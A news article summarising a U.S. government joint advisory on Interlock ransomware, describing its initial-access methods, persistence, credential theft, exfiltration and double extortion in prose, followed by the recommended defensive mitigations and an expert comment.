U.S. agencies on Tuesday released a joint cybersecurity advisory detailing known Interlock ransomware indicators of compromise and tactics, techniques, and procedures uncovered in recent FBI investigations, as part of an ongoing effort to publish guidance for network defenders that details various ransomware variants and ransomware threat actors. First observed in late September 2024, the advisory aims to help businesses, critical infrastructure operators, and other organizations in North America and Europe defend against ongoing Interlock ransomware threats.
“FBI maintains these actors target their victims based on opportunity, and their activity is financially motivated. FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems; these encryptors have been observed encrypting virtual machines (VMs) across both operating systems,” the FBI, Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC), identified in the advisory. “FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups.”
The advisory added that the hackers were also observed using the ClickFix social engineering technique for initial access, in which victims are tricked into executing a malicious payload under the guise of fixing an issue on the victim’s system. “Actors then use various methods for discovery, credential access, and lateral movement to spread to other systems on the network. Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, which increases pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked.”
The agencies detailed that the Interlock actors leverage a double extortion model, in which they both encrypt and exfiltrate victim data. Ransom notes do not include an initial ransom demand or payment instructions; instead, victims are provided with a unique code and are instructed to contact the ransomware group via a .onion URL through the Tor browser.
To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future. To counter Interlock actors’ threat to VMs, enterprise defenders should implement robust endpoint detection and response (EDR) tooling and capabilities.
The FBI has observed Interlock actors obtaining initial access via drive-by download from compromised legitimate websites, an atypical method for ransomware actors. Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software.
In some instances, the FBI has observed Interlock actors using the ClickFix social engineering technique, in which unsuspecting users are prompted to execute a malicious payload by clicking a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to open the Windows Run window, paste the clipboard contents, and then execute a malicious Base64-encoded PowerShell process.
Based on FBI investigations, the fake Google Chrome browser executable functions as a remote access trojan (RAT) designed to execute a PowerShell script that drops a file into the Windows Startup folder. From there, the file is designed to run the RAT every time the victim logs in, establishing persistence. FBI also observed instances in which Interlock actors executed a PowerShell command designed to establish persistence via a Windows Registry key modification. To do so, Interlock actors used a PowerShell command designed to add a run key value named ‘Chrome Updater’ that uses a specific log file as an argument upon user login.
The advisory mentioned that the FBI observed Interlock actors using command and control (C2) applications like Cobalt Strike and SystemBC. Interlock actors also used Interlock RAT4F 5 and NodeSnake RAT for C2 and executing commands. The agency also observed that once Interlock actors establish remote control of a compromised system, they use a series of PowerShell commands to download a credential stealer (cht[dot]exe) and keylogger binary (klg[dot]dll).
According to open source reporting, the credential stealer collects login information and associated URLs for victims’ online accounts, while the keylogger dynamic link library (DLL) logs users’ keystrokes in a file named conhost[dot]txt.
As of February this year, the advisory said that private cybersecurity analysts also observed Interlock ransomware infections executing different versions of information stealers, including Lumma Stealer and Berserk Stealer, to harvest credentials for lateral movement and privilege escalation. These hackers leverage compromised credentials and Remote Desktop Protocol (RDP) to move between systems. They also use tools like AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement. Apart from stealing users’ online credentials, Interlock actors have compromised domain administrator accounts, possibly by using a Kerberoasting attack to gain additional privileges.
Interlock actors leverage Azure Storage Explorer (StorageExplorer[dot]exe) to navigate victims’ Microsoft Azure Storage accounts before exfiltrating data. According to open source reporting, Interlock actors execute AzCopy to exfiltrate data by uploading it to the Azure storage blob. Interlock actors also exfiltrate data over file transfer tools, including WinSCP.
The cybersecurity advisory detailed that Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. “The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors. The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat.”
The advisory outlines several actions organizations can take immediately to mitigate the threat of Interlock ransomware. Organizations should prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and by training users to recognize and report social engineering attempts. They should address known vulnerabilities by ensuring that all operating systems, software, and firmware are fully patched and kept up to date.
Organizations are also urged to segment their networks to limit lateral movement from an initially infected device to other systems within the same environment. The advisory also recommends enforcing strong identity, credential, and access management policies across the organization, and requiring multifactor authentication for services wherever feasible.
Furthermore, organizations should implement a recovery plan that includes maintaining multiple copies of sensitive data in physically separate and secure locations. All accounts with password logins must follow NIST standards, with long passwords recommended and frequent password changes discouraged. Multifactor authentication should be required wherever possible, especially for webmail, VPNs, and access to critical systems, supported by organization-wide identity and access management policies.
Systems must be kept up to date, with priority given to patching known exploited vulnerabilities on internet-facing infrastructure. Endpoint detection and response (EDR) tools should be deployed across networks, systems, and virtual machines to detect and block lateral movement. Network segmentation is essential to limit ransomware spread, while traffic from unknown or untrusted sources should be filtered to block unauthorized remote access. Organizations should also monitor network activity for anomalies using logging tools that capture all traffic.
Antivirus software must be installed, updated, and configured for real-time detection on all hosts. Administrators should regularly review systems for unrecognized or suspicious accounts and audit user privileges based on the principle of least privilege. Additional protections include disabling unused ports, adding banners to emails from external sources, disabling email hyperlinks, and using time-based access controls, such as just-in-time provisioning, for high-level administrative accounts.
Organizations should allow users to request temporary system access through an automated process to support specific tasks. To reduce risk, command line and scripting capabilities should be disabled, limiting threat actor movement and privilege escalation. Offline backups must be maintained and tested regularly to ensure data can be restored in case of a compromise. All backups should be encrypted, immutable, and comprehensive, covering the organization’s entire data infrastructure.
Commenting on the cybersecurity advisory, Erich Kron, security awareness advocate at KnowBe4, wrote in an emailed statement that “while a fairly new ransomware group, Interlock is working to make a name for themselves. Their use of compromised websites for drive-by malware downloads is not very common in the world of ransomware, but their use of social engineering certainly is. Convincing people to install updates or fixes, really just disguised malware, in ClickFix attacks and is not a new concept as fake updates or antivirus notifications have been around for years.”
“To counter the threat, organizations need to ensure their employees are aware of the campaigns and are taught to spot them, and that they are aware of the real and legitimate process the organization’s I.T. department uses to install patches or updates so they are not tricked into executing malware,” according to Kron. “A comprehensive Human Risk Management program is vital when dealing with human-centric attacks such as this, as is a good endpoint protection platform. Patching machines, browsers, and other software can help limit the ability for malware to launch and for bad actors to move around the network or elevate permissions as well.”
Earlier this month, U.S. security agencies urged critical infrastructure operators to stay alert for possible cyberattacks by Iranian state-sponsored or affiliated threat actors, while also identifying and disconnecting OT (operational technology) and ICS (industrial control system) assets from the public internet. Given current geopolitical tensions, these groups could target U.S. networks and devices in the near term. The agencies also highlighted the heightened risks for defense industrial base (DIB) companies with ties to Israeli research or defense firms.
